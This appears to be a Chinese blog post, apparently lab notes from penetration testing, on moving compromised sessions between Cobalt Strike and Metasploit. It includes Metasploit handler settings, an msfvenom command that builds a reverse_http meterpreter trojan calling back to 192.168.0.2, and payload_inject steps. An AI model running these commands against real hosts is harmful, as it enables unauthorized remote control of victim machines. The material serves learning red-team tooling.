Cobalt Strike会话管理

已于 2023-07-08 10:33:50 修改
阅读量466 收藏
点赞数
分类专栏: Metasploit 文章标签: CS CS会话管理
于 2022-01-06 07:51:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f_carey/article/details/122335833
版权

Cobalt Strike会话管理

1 增加 CS 会话

  1. 添加新侦听器

    image-20211227220742641

  2. 在获得的 session 会话中选择"新建会话(spawn)":选择新添加的侦听器

    image-20211227220451077

  3. image-20211227220828410

  4. 获取到新的会话

    image-20211227220954446

2 利用 CS 会话生成 MSF 会话

  1. 添加新外部侦听器

    image-20211227221731475

  2. 配置 MSF 如下

    msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf6 exploit(multi/handler) > set lport 480
lport => 480
msf6 exploit(multi/handler) > run

  3. 在获得的 session 会话中选择"新建会话(spawn)":选择新添加的外部侦听器

    image-20211227222106687

  4. 获取到 meterpreter 会话

    image-20211227222629441

3 利用 msfvenom 生成的文件生成 MSF 会话

  1. 添加新侦听器

    image-20211227222920462

  2. MSF 生成与 CS 建立会话的木马

    sudo msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.0.2 LPORT=580 -f exe > /var/www/html/shell1.exe

  3. 在目标主机上运行 MSF 所生成的木马文件,获得 CS 会话

    image-20211227224535904

4 利用 MSF 会话生成 CS 会话

  1. 添加新侦听器

    image-20211227225545287

  2. 配置 MSF 如下

    msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set session 3
session => 3
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.0.2
lhost => 192.168.0.2
msf6 exploit(windows/local/payload_inject) > set lport 680
lport => 680
msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true 
disablepayloadhandler => true
# 将DisablePayLoadHandler设置为true。不使用 metasploit 来处理负载连接。

flag{8ff7cf91-537c-478f-b025-b9af61462ac7}

    image-20211227225655807

  3. 运行 payload 将 MSF 会话传递给 CS

    image-20211227230042580

f_carey
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
152.网络安全渗透测试—[Cobalt Strike系列]—[会话管理/派生]
qwsn
03-24 2522
一、会话管理 1、实验环境 2、会话派生 (1)128的cs会话派生给128的cs本身 (2)128的cs会话派生给129的cs会话 (3)128的cs会话派生到129的msf会话 (4)129的msf生成木马 + 128的cs获取新会话 (5)129的msf溢出exp发到128的cs会话 (6)129的msf会话派生给128的cs会话
【渗透测试笔记】之【Cobalt Strike小技巧——后台挂起CS服务端】_cobaltstrike服务器端怎么关闭
最新发布
2401_84968303的博客
05-13 362
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Cobalt Strike(五)会话管理
qq_56426046的博客
09-20 1080
测试环境系统服务ipteamservermetasploitvictimvictim。
Cobalt Strike 会话管理
yyj1781572的博客
11-17 442
Cobalt Strike 会话管理
【渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(与MSF联动)】
AA8j的博客
06-29 306
会话管理 1.CS会话派生到CS 首先新建一个监听器用于监听派生的会话 右键要派生的会话点击spawn 然后选择派生到刚刚新建的监听器上,点击choose即可。 也可以先连接其它cs服务器新建监听器,将会话派生到其它cs服务器上 2.CS会话派生到MSF 开启MSF监听: 在CS上创建监听器并指向MSF监听的地址: 通过Spawn将已有会话派生到新创建的监听器中: 可以看到会话成功派生到了MSF上: 3.MSF派生CS会话 1.生成木马直接回连到CS CS新建
cobaltstrike中文版.zip
05-17
这个“cobaltstrike中文版.zip”文件包含了Cobalt Strike的中文版本,这对于中文使用者来说是一个很好的资源,能够帮助他们更好地理解和操作这款工具。 Cobalt Strike的核心功能包括: 1. **Beacon**:这是Cobalt ...
CobaltStrike4.1
03-10
1. **Team Server**:是Cobalt Strike的核心,负责管理Beacon会话、存储数据和执行任务。 2. **Beacon**:是植入到目标系统中的轻量级代理,用于执行命令、收集信息和进行横向移动。 3. **Malleable C2**:允许用户...
CobaltStrike4.0渗透测试手册
03-18
4. **Meterpreter会话管理**:Meterpreter是一种强大的后渗透工具,手册将阐述如何启动、管理及利用Meterpreter会话进行更深入的渗透测试。 5. **社会工程工具**:Cobalt Strike内置的社会工程工具,如钓鱼邮件生成...
cobaltstrike4.3.zip
12-03
在渗透测试过程中,Cobalt Strike的Meterpreter会话管理器也是一个关键组件。这个模块在4.3版本中提供了更多的API函数,使得测试人员可以在目标系统上执行更复杂的操作,如文件管理、注册表操作、进程控制等。同时,...
cobaltstrike4.0
05-27
4. **更丰富的团队服务器功能**:团队服务器是Cobalt Strike的指挥中心,用于管理Beacon会话和任务。新版本可能强化了审计和管理功能,便于操作员跟踪和控制整个渗透测试过程。 5. **自动化和脚本支持**:Cobalt ...
CobaltStrike使用-第二篇(攻击模块、会话管理CS-MSF联动)
Love&Share
11-30 2089
文章目录攻击用户驱动攻击用户截屏进程管理文件管理远程VNC浏览器代理用户发现&端口扫描视图会话管理会话传递相关命令CS派生会话CS派生MSF会话MSF木马->CS会话MSFexp->CS会话MSFsession派生到CS 攻击 当我们拿到Victim的Beacon之后就要进行攻击,CS中提供了很多攻击模块,接下来介绍常见使用方法 用户驱动攻击 用户截屏 在目标中选择屏幕截图即可获取截图,截图会在视图->屏幕截图中显示 因为默认会话60秒返回一次,所以再执行操作60秒之后会得到.
Cobalt Strike与Metasploit会话互转
zzgslh的博客
03-20 990
Cobalt Strike与Metasploit会话互转 一、前言 Cobalt Strike和Metasploit是渗透测试经常会用到的两个工具,Cobalt Strike 与 Metasploit在很多地方都是兼容的,所以我们便可以将 Metasploit攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike会话也能够传递到 Metasploit上。 二、Metasploit会话转到Cobaltstrike (1)首先通过Metasploit获取会话。 (2)会话
Cobaltstrike系列教程(十二)CS与MSF,Armitage,Empire会话互转
J0o1ey Blog
01-19 2662
0x001-Cobaltstrike与MSF会话互转 ①Metasploit派生shell给Cobaltstrike 首先,你需要拿到一个metepreter会话,本例中session为1 Cobaltstrike的teamserver的ip为8.8...
渗透工具之CS4.0使用说明书
m0_59991869的博客
10-14 4671
CS4.0使用说明书 目录 安装 使用 运行 监听器 listner 使用 不同监听介绍 木马 生成后门 钓鱼攻击 邮件钓鱼 功能 上部选项栏 下部工具栏 beacon的使用 会话功能 安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver
cobalt strike 会话转移
Armandhe的博客
06-22 2383
纯属笔记
CS学习笔记】4、快速登陆和生成会话报告
TeamsSix 的 CSDN 空间
04-20 360
0x00 介绍 Cobalt Strike生成报告的目的在于培训或帮助蓝队,在Reporting菜单栏中就可以生成报告,关于生成的报告有以下特点: 输出格式为PDF或者Word格式 可以输出自定义报告并且更改图标(Cobalt Strike --> Preferences -->Reporting) 可以合并多个团队服务器的报告,并可以对不同报告里的时间进行校正 0x01 导出报告...
Cobalt Strike使用教程——基础篇
热门推荐
Captain_RB的博客
06-10 1万+
本文主要介绍 **Cobalt Strike** 4.3 的基本功能及使用方法
Cobalt Strike 插件
08-10
这些插件可以在CobaltStrike 4.0以上版本中运行,并且可以在实验中成功上线。另外,根据引用和,Cobalt Strike的SSH客户端使用SMB Beacon协议,并实现Beacon命令调用以及子功能的使用。SSH会话可以看作是包含较少...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值